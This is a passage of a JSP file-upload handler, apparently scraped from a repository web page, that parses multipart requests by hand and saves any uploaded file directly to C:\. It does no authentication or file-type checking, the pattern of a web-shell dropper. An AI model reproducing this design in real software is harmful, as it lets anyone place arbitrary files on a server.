while(enum.hasMoreElements()){
|
||||
String header = (String)enum.nextElement();
|
||||
String hvalue = request.getHeader(header);
|
||||
prop.setProperty((header).toLowerCase(),hvalue);
|
||||
if("content-type".equalsIgnoreCase(header) ){
|
||||
int idx = hvalue.lastIndexOf("boundary=");
|
||||
if(idx != -1 ){
|
||||
boundary= hvalue.substring(idx+9 , hvalue.length());
|
||||
}
|
||||
}
|
||||
}
|
||||
return boundary;
|
||||
|
||||
}
|
||||
public String getFileName(String secondline){
|
||||
int len = secondline.length();
|
||||
int idx = secondline.lastIndexOf("filename=");
|
||||
if(idx == -1 ) return null;
|
||||
String filename = secondline.substring(idx+10 , len-1);
|
||||
filename = filename.replace('\\','/');
|
||||
idx = filename.lastIndexOf("/");
|
||||
idx = idx + 1;
|
||||
filename = filename.substring( idx );
|
||||
return filename;
|
||||
}
|
||||
%>
|
||||
<%
|
||||
String DPATH = "c:\\";
|
||||
int ROUGHSIZE = 640000; // BUG: Corta el fichero si es mayor de 640Ks
|
||||
int MAXSIZE = 10; // 10 Mega Byte
|
||||
String boundary = getBoundary(request,prop);
|
||||
if(boundary == null ){
|
||||
boundary = prop.getProperty("boundary");
|
||||
}else{
|
||||
boundary = "--"+boundary;
|
||||
}
|
||||
if(boundary == null ){
|
||||
return;
|
||||
}
|
||||
Long contentsize = new Long(prop.getProperty("content-length","0"));
|
||||
int c;
|
||||
StringWriter st = new StringWriter();
|
||||
if(contentsize.longValue() < 1L ){
|
||||
return;
|
||||
}
|
||||
long l = contentsize.longValue() - ROUGHSIZE;
|
||||
int KB = 1024;
|
||||
int MB = 1024 * KB;
|
||||
int csize = (int)(l / MB);
|
||||
if(csize > MAXSIZE ){
|
||||
return;
|
||||
}
|
||||
ServletInputStream fin = request.getInputStream();
|
||||
int cn;
|
||||
int count=0;
|
||||
while((c=fin.read()) != -1 ){
|
||||
if( c == '\r') break;
|
||||
st.write(c);
|
||||
count++;
|
||||
}
|
||||
c=fin.read();
|
||||
String tboundary = st.getBuffer().toString();
|
||||
tboundary=tboundary.trim();
|
||||
if(! tboundary.equalsIgnoreCase( boundary) ){
|
||||
return;
|
||||
}
|
||||
st.close();
|
||||
st = null;
|
||||
st = new StringWriter();
|
||||
while((c=fin.read()) != -1 ){
|
||||
if( c == '\r' ) break;
|
||||
st.write(c);
|
||||
}
|
||||
c=fin.read();
|
||||
String secondline = st.getBuffer().toString();
|
||||
String filename = getFileName(secondline);
|
||||
st.close();
|
||||
st = null;
|
||||
st = new StringWriter();
|
||||
while((c=fin.read()) != -1 ){
|
||||
if( c == '\r' ) break;
|
||||
st.write( c );
|
||||
}
|
||||
c=fin.read();
|
||||
|
||||
fin.read();
|
||||
fin.read();
|
||||
File newfile = null;
|
||||
FileOutputStream fout =null;
|
||||
try{
|
||||
if(filename == null) throw new FileNotFoundException("File Name not found");
|
||||
newfile = new File(DPATH+filename);
|
||||
fout = new FileOutputStream( newfile );
|
||||
}catch(FileNotFoundException fnexp){
|
||||
fin.close();
|
||||
return;
|
||||
}
|
||||
|
||||
byte b[] = null;
|
||||
while(l > 1024L){
|
||||
b = new byte[1024];
|
||||
fin.read(b,0,1024);
|
||||
fout.write(b);
|
||||
b=null;
|
||||
l -= 1024L;
|
||||
}
|
||||
if(l > 0){
|
||||
b = new byte[(int)l];
|
||||
fin.read(b,0,(int)l);
|
||||
fout.write(b);
|
||||
}
|
||||
|
||||
|
||||
ByteArrayOutputStream baos = new ByteArrayOutputStream();
|
||||
while((c = fin.read()) != -1){
|
||||
baos.write(c);
|
||||
}
|
||||
String laststring = baos.toString();
|
||||
int idx = laststring.indexOf(boundary);
|
||||
b = baos.toByteArray();
|
||||
if(idx > 2){
|
||||
fout.write(b,0,idx-2);
|
||||
}else{
|
||||
fout.close();
|
||||
newfile.delete();
|
||||
return;
|
||||
}
|
||||
fout.flush();
|
||||
fout.close();
|
||||
fin.close();
|
||||
|
||||
out.println("FileName: " + newfile.getName());
|
||||
out.println("FileSize: " + newfile.length());
|
||||
|
||||
%>
|
||||
|
||||
|
||||
|
||||
|
||||
|
Loading…
Reference in a new issue